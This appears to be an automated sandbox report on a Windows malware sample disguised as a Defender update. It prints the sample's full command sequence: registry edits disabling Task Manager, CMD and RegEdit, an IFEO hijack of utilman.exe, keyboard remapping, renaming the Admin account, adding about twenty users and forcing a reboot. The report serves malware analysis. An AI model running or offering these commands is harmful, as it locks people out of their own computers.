Analysis

  • max time kernel
    5s
  • max time network
    8s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-10-2024 02:33

Errors

Reason
Machine shutdown

General

  • Target

    b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe

  • Size

    955KB

  • MD5

    bde1d37ad1cf05320955681bf6455efa

  • SHA1

    52feb8bc6c21770eea00d19b1c228ee707228da7

  • SHA256

    b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f

  • SHA512

    17d9f2c319aa082d5fdf97ba7bc49505c1f768bf217383b220204cf7b4511d0c227408200e40a943c1e5228a1199f7ef218d5fdfd66d394547a6efb4a72e1e15

  • SSDEEP

    24576:kuDXTIGaPhEYzUzA0SH6xrfNZh0WewxWr:DDjlabwz9nxJZ+wxc

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
  • Disables Task Manager via registry modification
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 28 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Accessibility Features 1 TTPs

    Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 8 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
    "C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
    1⤵
    • Checks computer location settings
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4752
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
        3⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 0000000000000071000000000000010000003b0000003c0000003d0000003e0000003f0000004000000041000000420000004300000044000000570000005800000037e000004600000052e0000047e0000049e0000051e000004fe0000053e0000048e000004be0000050e000004de00000520000005300000051000000500000004f0000004b0000004c0000004d0000004e0000004900000048000000470000004500000035e00000370000004a0000002900000002000000030000000400000005000000060000000700000008000000090000000a0000000b0000000c0000000d0000000f0000001000000011000000130000001600000017000000190000001a0000001b0000002b000000280000002700000026000000250000002400000022000000210000003a0000002a0000001d0000005be00000380000002c0000002d0000002e0000002f0000003000000032000000330000003400000035000000360000001de000005de000005ce0000038e000005900000065e0000021e000006be000005ee000005fe000006ae0000069e0000068e0000067e0000032e000006ce000006de0000066e0000020e000002ee000002ce0000030e0000019e0000010e0000024e0000022e0000000 /f
          4⤵
            PID:1016
          • C:\Windows\system32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
            4⤵
              PID:1836
            • C:\Windows\system32\reg.exe
              reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
              4⤵
                PID:2932
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
                4⤵
                  PID:776
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
                  4⤵
                    PID:4324
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
                    4⤵
                    • Event Triggered Execution: Image File Execution Options Injection
                    PID:3776
                  • C:\Windows\system32\reg.exe
                    reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
                    4⤵
                    • Sets desktop wallpaper using registry
                    PID:1788
                  • C:\Windows\system32\rundll32.exe
                    RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                    4⤵
                      PID:2680
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
                      4⤵
                        PID:5096
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                        4⤵
                          PID:2592
                        • C:\Windows\system32\reg.exe
                          reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
                          4⤵
                            PID:3212
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
                            4⤵
                              PID:448
                            • C:\Windows\system32\reg.exe
                              reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
                              4⤵
                                PID:3300
                              • C:\Windows\system32\reg.exe
                                reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
                                4⤵
                                • Disables RegEdit via registry modification
                                PID:4860
                              • C:\Windows\System32\Wbem\WMIC.exe
                                wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
                                4⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2828
                              • C:\Windows\system32\net.exe
                                net user "YOU ARE THE NEXT" "im dead"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1616
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
                                  5⤵
                                    PID:4392
                                • C:\Windows\system32\net.exe
                                  net user T3yZrQ Maxcheto /add
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3084
                                  • C:\Windows\system32\net1.exe
                                    C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
                                    5⤵
                                      PID:4284
                                  • C:\Windows\system32\net.exe
                                    net user 8rJpX1 Maxcheto /add
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3280
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
                                      5⤵
                                        PID:1504
                                    • C:\Windows\system32\net.exe
                                      net user 9MaL2Z Maxcheto /add
                                      4⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3456
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
                                        5⤵
                                          PID:3992
                                      • C:\Windows\system32\net.exe
                                        net user K4$dF27 Maxcheto /add
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:2532
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
                                          5⤵
                                            PID:3760
                                        • C:\Windows\system32\net.exe
                                          net user xC78RT Maxcheto /add
                                          4⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:3432
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 user xC78RT Maxcheto /add
                                            5⤵
                                              PID:2876
                                          • C:\Windows\system32\net.exe
                                            net user 3nL9$p2x Maxcheto /add
                                            4⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:3464
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
                                              5⤵
                                                PID:2788
                                            • C:\Windows\system32\net.exe
                                              net user X7hbQ5Z Maxcheto /add
                                              4⤵
                                                PID:1432
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
                                                  5⤵
                                                    PID:1932
                                                • C:\Windows\system32\net.exe
                                                  net user R2xD1B Maxcheto /add
                                                  4⤵
                                                    PID:224
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 user R2xD1B Maxcheto /add
                                                      5⤵
                                                        PID:1984
                                                    • C:\Windows\system32\net.exe
                                                      net user m14T8z Maxcheto /add
                                                      4⤵
                                                        PID:3008
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 user m14T8z Maxcheto /add
                                                          5⤵
                                                            PID:3528
                                                        • C:\Windows\system32\net.exe
                                                          net user L27w8G Maxcheto /add
                                                          4⤵
                                                            PID:2364
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 user L27w8G Maxcheto /add
                                                              5⤵
                                                                PID:4108
                                                            • C:\Windows\system32\net.exe
                                                              net user P9dR2Y Maxcheto /add
                                                              4⤵
                                                                PID:2448
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
                                                                  5⤵
                                                                    PID:3576
                                                                • C:\Windows\system32\net.exe
                                                                  net user 5QL71t Maxcheto /add
                                                                  4⤵
                                                                    PID:1592
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 user 5QL71t Maxcheto /add
                                                                      5⤵
                                                                        PID:4672
                                                                    • C:\Windows\system32\net.exe
                                                                      net user r8B6V3F Maxcheto /add
                                                                      4⤵
                                                                        PID:5028
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
                                                                          5⤵
                                                                            PID:2632
                                                                        • C:\Windows\system32\net.exe
                                                                          net user 7CXz1b Maxcheto /add
                                                                          4⤵
                                                                            PID:3384
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
                                                                              5⤵
                                                                                PID:4972
                                                                            • C:\Windows\system32\net.exe
                                                                              net user n38vJQ Maxcheto /add
                                                                              4⤵
                                                                                PID:3584
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 user n38vJQ Maxcheto /add
                                                                                  5⤵
                                                                                    PID:4144
                                                                                • C:\Windows\system32\net.exe
                                                                                  net user x6G7P1L Maxcheto /add
                                                                                  4⤵
                                                                                    PID:900
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
                                                                                      5⤵
                                                                                        PID:4416
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net user M239Wk Maxcheto /add
                                                                                      4⤵
                                                                                        PID:1104
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 user M239Wk Maxcheto /add
                                                                                          5⤵
                                                                                            PID:3664
                                                                                        • C:\Windows\system32\net.exe
                                                                                          net user 7F2hY4Z Maxcheto /add
                                                                                          4⤵
                                                                                            PID:4460
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
                                                                                              5⤵
                                                                                                PID:4152
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net user 8QrB1L7 Maxcheto /add
                                                                                              4⤵
                                                                                                PID:2732
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
                                                                                                  5⤵
                                                                                                    PID:4528
                                                                                                • C:\Windows\system32\net.exe
                                                                                                  net user t93V6D Maxcheto /add
                                                                                                  4⤵
                                                                                                    PID:2860
                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                      C:\Windows\system32\net1 user t93V6D Maxcheto /add
                                                                                                      5⤵
                                                                                                        PID:2444
                                                                                                    • C:\Windows\system32\net.exe
                                                                                                      net user 5tG2Q8J Maxcheto /add
                                                                                                      4⤵
                                                                                                        PID:3040
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
                                                                                                          5⤵
                                                                                                            PID:2648
                                                                                                        • C:\Windows\system32\net.exe
                                                                                                          net user x9K1P7L Maxcheto /add
                                                                                                          4⤵
                                                                                                            PID:4616
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
                                                                                                              5⤵
                                                                                                                PID:5012
                                                                                                            • C:\Windows\system32\net.exe
                                                                                                              net user z7R4M3 Maxcheto /add
                                                                                                              4⤵
                                                                                                                PID:4888
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
                                                                                                                  5⤵
                                                                                                                    PID:1372
                                                                                                                • C:\Windows\system32\shutdown.exe
                                                                                                                  shutdown /r /f /t 0
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2148
                                                                                                          • C:\Windows\system32\LogonUI.exe
                                                                                                            "LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d
                                                                                                            1⤵
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:1476

                                                                                                          Network

                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                          Replay Monitor

                                                                                                          Loading Replay Monitor...

                                                                                                          Downloads

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt

                                                                                                            Filesize

                                                                                                            64B

                                                                                                            MD5

                                                                                                            e3a317c88b65b975be8e1c21e149f16d

                                                                                                            SHA1

                                                                                                            6e7a24a1146ba2800bf0c56ef5b17ea32b01f019

                                                                                                            SHA256

                                                                                                            b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0

                                                                                                            SHA512

                                                                                                            1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png

                                                                                                            Filesize

                                                                                                            68KB

                                                                                                            MD5

                                                                                                            908587d867cd053293e2106d70cf42f3

                                                                                                            SHA1

                                                                                                            83ffc3fc7f61d972b41347ff783a29b41bf13087

                                                                                                            SHA256

                                                                                                            f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444

                                                                                                            SHA512

                                                                                                            541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd

                                                                                                            Filesize

                                                                                                            5KB

                                                                                                            MD5

                                                                                                            7835d8ae389b8b78ea4d06c024d63849

                                                                                                            SHA1

                                                                                                            5a0196e67a8af7185b372aacf5ad817a26546ad1

                                                                                                            SHA256

                                                                                                            029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1

                                                                                                            SHA512

                                                                                                            3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs

                                                                                                            Filesize

                                                                                                            134B

                                                                                                            MD5

                                                                                                            7c652236d1e09a76cfc27cb2611b80ad

                                                                                                            SHA1

                                                                                                            f9c359054835b06308165e110cdc5229d4fda8fb

                                                                                                            SHA256

                                                                                                            4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c

                                                                                                            SHA512

                                                                                                            6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png

                                                                                                            Filesize

                                                                                                            14KB

                                                                                                            MD5

                                                                                                            f346c440007285aff13e1e0512608862

                                                                                                            SHA1

                                                                                                            4b4a44bc30d37c66dea948bd406effc2bcc63775

                                                                                                            SHA256

                                                                                                            2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901

                                                                                                            SHA512

                                                                                                            34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png

                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            4947724257526b4226e21ae7541822cd

                                                                                                            SHA1

                                                                                                            af4db735de48a5069e70758bdfdf41a8214aa346

                                                                                                            SHA256

                                                                                                            19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba

                                                                                                            SHA512

                                                                                                            52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            2f368b76ab153329fb42db70493474b1

                                                                                                            SHA1

                                                                                                            4c4752399ee2678f6cf4d67affca9dcba59d0023

                                                                                                            SHA256

                                                                                                            ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f

                                                                                                            SHA512

                                                                                                            adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png

                                                                                                            Filesize

                                                                                                            2KB

                                                                                                            MD5

                                                                                                            9ef9685c5a578bfdceccaedb0d5fa519

                                                                                                            SHA1

                                                                                                            713f8621414772eee6602f9fa9ee0a3528d62057

                                                                                                            SHA256

                                                                                                            6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746

                                                                                                            SHA512

                                                                                                            2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp

                                                                                                            Filesize

                                                                                                            784KB

                                                                                                            MD5

                                                                                                            40e2162dfc51fded60ea7b1de3acf588

                                                                                                            SHA1

                                                                                                            3c0b932a845027db10e67c47c0c9cd45fa80ecbb

                                                                                                            SHA256

                                                                                                            d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7

                                                                                                            SHA512

                                                                                                            453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a

                                                                                                          • C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png

                                                                                                            Filesize

                                                                                                            68KB

                                                                                                            MD5

                                                                                                            1db691b8c60c5f82f3dae2df999c1c7c

                                                                                                            SHA1

                                                                                                            c252d4a6e065ab5b122f0ae43f6abdbaad49d80e

                                                                                                            SHA256

                                                                                                            f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d

                                                                                                            SHA512

                                                                                                            3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7

                                                                                                          • \??\PIPE\lsarpc

                                                                                                            MD5

                                                                                                            d41d8cd98f00b204e9800998ecf8427e

                                                                                                            SHA1

                                                                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                            SHA256

                                                                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                            SHA512

                                                                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e